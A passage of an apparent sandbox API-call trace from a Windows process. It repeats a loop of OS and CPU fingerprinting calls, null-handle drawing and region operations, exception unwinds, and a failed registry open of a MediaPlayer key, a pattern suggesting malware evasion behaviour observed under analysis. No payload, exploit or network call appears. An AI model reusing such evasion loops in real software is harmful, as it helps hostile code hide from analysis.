wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.589] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.589] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.589] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.589] BeginPath (hdc=0x0) returned 0 [0087.589] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.589] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.589] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.589] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.589] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.589] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.589] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.589] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.589] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xf0401d0 [0087.589] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x110401cd [0087.589] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040810 [0087.589] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040811 [0087.589] CombineRgn (hrgnDst=0x1040810, hrgnSrc1=0xf0401d0, hrgnSrc2=0x110401cd, iMode=1) returned 1 [0087.589] CombineRgn (hrgnDst=0x1040811, hrgnSrc1=0xf0401d0, hrgnSrc2=0x110401cd, iMode=4) returned 2 [0087.589] CreateSolidBrush (color=0xff) returned 0x210080f [0087.589] CreateSolidBrush (color=0xff0000) returned 0x1100812 [0087.589] DeleteObject (ho=0x1100812) returned 1 [0087.589] DeleteObject (ho=0x110401cd) returned 1 [0087.589] DeleteObject (ho=0xf0401d0) returned 1 [0087.589] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.589] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.589] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.589] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.589] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.589] BeginPath (hdc=0x0) returned 0 [0087.589] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.589] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.590] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.590] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.590] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.590] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.590] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.590] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.590] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x120401cd [0087.590] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x100401d0 [0087.590] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040813 [0087.590] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040814 [0087.590] CombineRgn (hrgnDst=0x1040813, hrgnSrc1=0x120401cd, hrgnSrc2=0x100401d0, iMode=1) returned 1 [0087.590] CombineRgn (hrgnDst=0x1040814, hrgnSrc1=0x120401cd, hrgnSrc2=0x100401d0, iMode=4) returned 2 [0087.590] CreateSolidBrush (color=0xff) returned 0x2100812 [0087.590] CreateSolidBrush (color=0xff0000) returned 0x1100815 [0087.590] DeleteObject (ho=0x1100815) returned 1 [0087.590] DeleteObject (ho=0x100401d0) returned 1 [0087.590] DeleteObject (ho=0x120401cd) returned 1 [0087.590] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.590] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.590] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.590] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.590] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.590] BeginPath (hdc=0x0) returned 0 [0087.590] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.590] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.590] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.590] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.590] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.590] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.590] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.591] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.591] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x110401d0 [0087.591] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x130401cd [0087.591] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040816 [0087.591] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040817 [0087.591] CombineRgn (hrgnDst=0x1040816, hrgnSrc1=0x110401d0, hrgnSrc2=0x130401cd, iMode=1) returned 1 [0087.591] CombineRgn (hrgnDst=0x1040817, hrgnSrc1=0x110401d0, hrgnSrc2=0x130401cd, iMode=4) returned 2 [0087.591] CreateSolidBrush (color=0xff) returned 0x2100815 [0087.591] CreateSolidBrush (color=0xff0000) returned 0x1100818 [0087.591] DeleteObject (ho=0x1100818) returned 1 [0087.591] DeleteObject (ho=0x130401cd) returned 1 [0087.591] DeleteObject (ho=0x110401d0) returned 1 [0087.591] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.591] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.591] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.591] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.591] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.591] BeginPath (hdc=0x0) returned 0 [0087.591] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.591] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.591] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.591] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.591] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.591] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.591] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.591] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.591] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x140401cd [0087.591] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x120401d0 [0087.591] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040819 [0087.591] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104081a [0087.591] CombineRgn (hrgnDst=0x1040819, hrgnSrc1=0x140401cd, hrgnSrc2=0x120401d0, iMode=1) returned 1 [0087.591] CombineRgn (hrgnDst=0x104081a, hrgnSrc1=0x140401cd, hrgnSrc2=0x120401d0, iMode=4) returned 2 [0087.592] CreateSolidBrush (color=0xff) returned 0x2100818 [0087.592] CreateSolidBrush (color=0xff0000) returned 0x110081b [0087.592] DeleteObject (ho=0x110081b) returned 1 [0087.592] DeleteObject (ho=0x120401d0) returned 1 [0087.592] DeleteObject (ho=0x140401cd) returned 1 [0087.592] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.592] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.592] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.592] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.592] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.592] BeginPath (hdc=0x0) returned 0 [0087.592] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.592] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.592] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.592] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.592] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.592] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.592] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.592] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.592] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x130401d0 [0087.592] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x150401cd [0087.592] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104081c [0087.592] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104081d [0087.592] CombineRgn (hrgnDst=0x104081c, hrgnSrc1=0x130401d0, hrgnSrc2=0x150401cd, iMode=1) returned 1 [0087.592] CombineRgn (hrgnDst=0x104081d, hrgnSrc1=0x130401d0, hrgnSrc2=0x150401cd, iMode=4) returned 2 [0087.592] CreateSolidBrush (color=0xff) returned 0x210081b [0087.592] CreateSolidBrush (color=0xff0000) returned 0x110081e [0087.592] DeleteObject (ho=0x110081e) returned 1 [0087.592] DeleteObject (ho=0x150401cd) returned 1 [0087.592] DeleteObject (ho=0x130401d0) returned 1 [0087.592] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.592] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.592] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.592] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.592] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.592] BeginPath (hdc=0x0) returned 0 [0087.592] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.592] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.592] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.592] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.592] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.592] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.593] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.593] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.593] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x160401cd [0087.593] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x140401d0 [0087.593] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104081f [0087.593] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040820 [0087.593] CombineRgn (hrgnDst=0x104081f, hrgnSrc1=0x160401cd, hrgnSrc2=0x140401d0, iMode=1) returned 1 [0087.593] CombineRgn (hrgnDst=0x1040820, hrgnSrc1=0x160401cd, hrgnSrc2=0x140401d0, iMode=4) returned 2 [0087.593] CreateSolidBrush (color=0xff) returned 0x210081e [0087.593] CreateSolidBrush (color=0xff0000) returned 0x1100821 [0087.593] DeleteObject (ho=0x1100821) returned 1 [0087.593] DeleteObject (ho=0x140401d0) returned 1 [0087.593] DeleteObject (ho=0x160401cd) returned 1 [0087.593] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.593] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.593] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.593] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.593] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.593] BeginPath (hdc=0x0) returned 0 [0087.593] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.593] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.593] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.593] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.593] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.593] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.593] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.593] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.593] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x150401d0 [0087.593] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x170401cd [0087.593] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040822 [0087.593] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040823 [0087.593] CombineRgn (hrgnDst=0x1040822, hrgnSrc1=0x150401d0, hrgnSrc2=0x170401cd, iMode=1) returned 1 [0087.593] CombineRgn (hrgnDst=0x1040823, hrgnSrc1=0x150401d0, hrgnSrc2=0x170401cd, iMode=4) returned 2 [0087.593] CreateSolidBrush (color=0xff) returned 0x2100821 [0087.593] CreateSolidBrush (color=0xff0000) returned 0x1100824 [0087.594] DeleteObject (ho=0x1100824) returned 1 [0087.594] DeleteObject (ho=0x170401cd) returned 1 [0087.594] DeleteObject (ho=0x150401d0) returned 1 [0087.594] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.594] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.594] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.594] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.594] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.594] BeginPath (hdc=0x0) returned 0 [0087.594] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.594] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.594] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.594] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.594] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.594] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.594] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.594] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.594] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x180401cd [0087.594] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x160401d0 [0087.594] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040825 [0087.594] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040826 [0087.594] CombineRgn (hrgnDst=0x1040825, hrgnSrc1=0x180401cd, hrgnSrc2=0x160401d0, iMode=1) returned 1 [0087.594] CombineRgn (hrgnDst=0x1040826, hrgnSrc1=0x180401cd, hrgnSrc2=0x160401d0, iMode=4) returned 2 [0087.594] CreateSolidBrush (color=0xff) returned 0x2100824 [0087.594] CreateSolidBrush (color=0xff0000) returned 0x1100827 [0087.594] DeleteObject (ho=0x1100827) returned 1 [0087.594] DeleteObject (ho=0x160401d0) returned 1 [0087.594] DeleteObject (ho=0x180401cd) returned 1 [0087.594] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.594] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.594] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.594] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.594] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.594] BeginPath (hdc=0x0) returned 0 [0087.594] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.594] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.594] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.594] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.594] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.594] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.594] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.595] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.595] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x170401d0 [0087.595] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x190401cd [0087.595] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040828 [0087.595] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040829 [0087.595] CombineRgn (hrgnDst=0x1040828, hrgnSrc1=0x170401d0, hrgnSrc2=0x190401cd, iMode=1) returned 1 [0087.595] CombineRgn (hrgnDst=0x1040829, hrgnSrc1=0x170401d0, hrgnSrc2=0x190401cd, iMode=4) returned 2 [0087.595] CreateSolidBrush (color=0xff) returned 0x2100827 [0087.595] CreateSolidBrush (color=0xff0000) returned 0x110082a [0087.595] DeleteObject (ho=0x110082a) returned 1 [0087.595] DeleteObject (ho=0x190401cd) returned 1 [0087.595] DeleteObject (ho=0x170401d0) returned 1 [0087.595] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.595] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.595] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.595] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.595] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.595] BeginPath (hdc=0x0) returned 0 [0087.595] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.595] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.595] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.595] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.595] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.595] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.595] RtlUnwind (TargetFrame=0x181840, 